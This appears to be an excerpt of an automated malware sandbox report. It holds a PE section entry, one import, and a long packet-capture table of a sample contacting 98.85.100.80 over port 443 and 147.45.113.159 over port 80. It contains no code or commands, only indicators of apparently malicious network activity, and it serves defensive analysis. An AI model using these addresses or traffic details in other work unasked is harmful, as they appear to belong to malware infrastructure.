.taggant	0xb5e000	0x3000	0x2200	3b11582109b4d9ed11a760319280558f	False	0.07065716911764706	DOS executable (COM)	0.790657949320477	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0xb5be70	0x256	ASCII text, with CRLF line terminators			0.5100334448160535

Imports

DLL	Import
kernel32.dll	lstrcpy

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 20, 2024 16:56:52.483023882 CET	49715	443	192.168.2.5	98.85.100.80
Dec 20, 2024 16:56:52.483058929 CET	443	49715	98.85.100.80	192.168.2.5
Dec 20, 2024 16:56:52.483120918 CET	49715	443	192.168.2.5	98.85.100.80
Dec 20, 2024 16:56:52.498119116 CET	49715	443	192.168.2.5	98.85.100.80
Dec 20, 2024 16:56:52.498131037 CET	443	49715	98.85.100.80	192.168.2.5
Dec 20, 2024 16:56:54.233762980 CET	443	49715	98.85.100.80	192.168.2.5
Dec 20, 2024 16:56:54.234253883 CET	49715	443	192.168.2.5	98.85.100.80
Dec 20, 2024 16:56:54.234263897 CET	443	49715	98.85.100.80	192.168.2.5
Dec 20, 2024 16:56:54.235285997 CET	443	49715	98.85.100.80	192.168.2.5
Dec 20, 2024 16:56:54.235358953 CET	49715	443	192.168.2.5	98.85.100.80
Dec 20, 2024 16:56:54.236764908 CET	49715	443	192.168.2.5	98.85.100.80
Dec 20, 2024 16:56:54.236835957 CET	443	49715	98.85.100.80	192.168.2.5
Dec 20, 2024 16:56:54.242499113 CET	49715	443	192.168.2.5	98.85.100.80
Dec 20, 2024 16:56:54.242506027 CET	443	49715	98.85.100.80	192.168.2.5
Dec 20, 2024 16:56:54.288460016 CET	49715	443	192.168.2.5	98.85.100.80
Dec 20, 2024 16:56:54.816191912 CET	443	49715	98.85.100.80	192.168.2.5
Dec 20, 2024 16:56:54.816262007 CET	443	49715	98.85.100.80	192.168.2.5
Dec 20, 2024 16:56:54.816337109 CET	49715	443	192.168.2.5	98.85.100.80
Dec 20, 2024 16:56:54.827156067 CET	49715	443	192.168.2.5	98.85.100.80
Dec 20, 2024 16:56:54.827182055 CET	443	49715	98.85.100.80	192.168.2.5
Dec 20, 2024 16:56:56.434293985 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:56.553873062 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:56.554033041 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:56.554996967 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:56.674647093 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:56.674714088 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:56.674760103 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:56.674773932 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:56.674802065 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:56.674846888 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:56.674866915 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:56.674900055 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:56.674947023 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:56.675072908 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:56.675122976 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:56.675126076 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:56.675170898 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:56.675236940 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:56.675246954 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:56.675291061 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:56.676322937 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:56.676379919 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:56.794445992 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:56.794478893 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:56.794488907 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:56.794569016 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:56.794670105 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:56.794687986 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:56.794718027 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:56.794743061 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:56.794804096 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:56.796389103 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:56.841706038 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:56.845350027 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:56.957741022 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:56.961314917 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:57.005748034 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.121789932 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.122191906 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:57.325825930 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.330194950 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:57.577775002 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.579216957 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:57.610375881 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.611285925 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:57.611362934 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:57.698908091 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.699016094 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:57.731098890 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.731146097 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.731189013 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.731200933 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.731225967 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:57.731278896 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:57.731411934 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.731424093 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.731445074 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.731483936 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:57.731575012 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.731585979 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.731594086 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.731630087 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:57.731657982 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:57.731689930 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.731857061 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.731903076 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.731914043 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.731914997 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:57.731965065 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:57.732003927 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.732140064 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.732184887 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:57.732192039 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.732310057 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.732357979 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.732426882 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.732527971 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.732580900 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.732729912 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.732773066 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.732851982 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.732969999 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.732988119 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:57.733043909 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:57.733052015 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.733103991 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:57.733163118 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.733357906 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.733367920 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.733417034 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:57.733443975 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.735135078 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:57.818706036 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.819789886 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:57.850903988 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.850914955 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.850943089 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.851001978 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.851085901 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.851131916 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:57.851155043 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.851268053 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.851279020 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.851339102 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.851433039 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.851566076 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.851577044 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.851613998 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.851674080 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.851829052 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.851840019 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.851850986 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.852593899 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.852603912 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.852679968 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.852835894 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.852847099 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.852858067 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.852890015 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.852901936 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.852930069 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:57.852977037 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:57.852978945 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.852988958 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.853019953 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.853040934 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:57.853065968 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:57.853146076 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.853156090 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.853167057 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.853193045 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.853199005 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:57.853219986 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:57.853306055 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.853316069 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.853430986 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.853442907 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.853452921 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.853466988 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.853539944 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.853583097 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.853715897 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.853728056 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.853738070 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.853748083 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.853806019 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.853817940 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.853837967 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.853847980 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.853981018 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.853991985 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.854012012 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.854088068 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.854137897 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.854147911 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.854156971 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.854253054 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.854264021 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.854283094 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.854450941 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.854631901 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.854809046 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.939328909 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.939506054 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.970776081 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.970833063 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.971002102 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.971012115 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.971077919 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.971088886 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.971098900 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.972538948 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.972747087 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.972872972 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.972965956 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.973062038 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.973072052 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.973082066 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.973153114 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.973185062 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.973362923 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.973419905 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.973429918 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.973589897 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.973599911 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.973680973 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.973860025 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.973869085 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.973907948 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.973954916 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.973963976 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.974055052 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.974071980 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.974185944 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.974196911 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.974323988 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.974457979 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.974467993 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.974526882 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.974632025 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.974769115 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.974778891 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.974787951 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.974880934 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.974889994 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.974944115 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.975022078 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.975032091 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.975040913 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.975143909 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.975155115 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.975162983 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.975194931 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.975353003 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.975363016 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.975372076 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.975492001 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.975502014 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.975673914 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.975682974 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.975841045 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.975851059 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.975982904 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.975991964 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.976201057 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.977636099 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:57.977708101 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:57.977826118 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:57.977880001 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:57.979226112 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.979351997 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:57.979419947 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:58.007374048 CET	49721	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:58.097342014 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.097409010 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.097419977 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.097430944 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.097470999 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.097532034 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.097542048 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.097551107 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.097595930 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.097687006 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.097697020 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.097737074 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.097812891 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.097889900 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.097948074 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.097958088 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.098017931 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.098167896 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.098304987 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.098315954 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.098324060 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.098334074 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.098351955 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.098423004 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.098433018 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.098437071 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.098455906 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.098464966 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.098582029 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.098593950 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.098602057 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.098620892 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.098686934 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.098695993 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.098773003 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.098859072 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.098867893 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.098954916 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.098965883 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.098984003 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.099090099 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.099100113 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.099153042 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.099175930 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.099184990 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.099308014 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.099324942 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.099334002 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.099404097 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.099476099 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.099487066 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.099497080 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.099608898 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.099654913 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.099666119 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.099772930 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.099782944 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.099822044 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.099832058 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.099883080 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.099936008 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.099946022 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.100013971 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.100024939 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.100034952 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.100158930 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.100168943 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.100204945 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.100214005 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.100301027 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.100337029 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.100389957 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.100404024 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.100497007 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.100518942 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.100605011 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.100617886 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.100831985 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.100887060 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.100964069 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.100974083 CET	80	49721	147.45.113.159	192.168.2.5
